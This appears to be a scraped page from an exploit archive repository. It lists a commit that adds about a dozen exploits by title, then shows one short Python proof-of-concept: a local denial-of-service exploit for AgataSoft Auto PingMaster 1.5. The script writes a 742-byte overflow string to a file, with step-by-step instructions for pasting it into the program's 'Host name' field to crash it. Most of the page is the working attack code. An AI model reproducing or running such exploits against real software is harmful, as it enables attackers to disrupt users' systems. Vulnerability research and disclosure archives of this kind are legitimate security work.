9ea5e15796
13 changes to exploits/shellcodes Sun Solaris 11.3 AVS - Local Kernel root Exploit Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC) AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit) wityCMS 0.6.1 - Cross-Site Scripting Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change) TI Online Examination System v2 - Arbitrary File Download PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution Seq 4.2.476 - Authentication Bypass
24 lines
No EOL
795 B
Python
Executable file
24 lines
No EOL
795 B
Python
Executable file
# Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
|
|
# Discovery by: Luis Martinez
|
|
# Discovery Date: 2018-08-02
|
|
# Vendor Homepage: http://agatasoft.com/
|
|
# Software Link : http://agatasoft.com/Ping_Master.exe
|
|
# Tested Version: 1.5
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python AgataSoft_Auto_PingMaster_1.5.py
|
|
# 2.- Open AgataSoft_Auto_PingMaster_1.5.txt and copy content to clipboard
|
|
# 3.- Open Ping_Master.exe
|
|
# 4.- Trace Route
|
|
# 5.- Paste ClipBoard on "Host name:"
|
|
# 6.- Get IP from host name
|
|
# 7.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 742
|
|
f = open ("AgataSoft_Auto_PingMaster_1.5.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |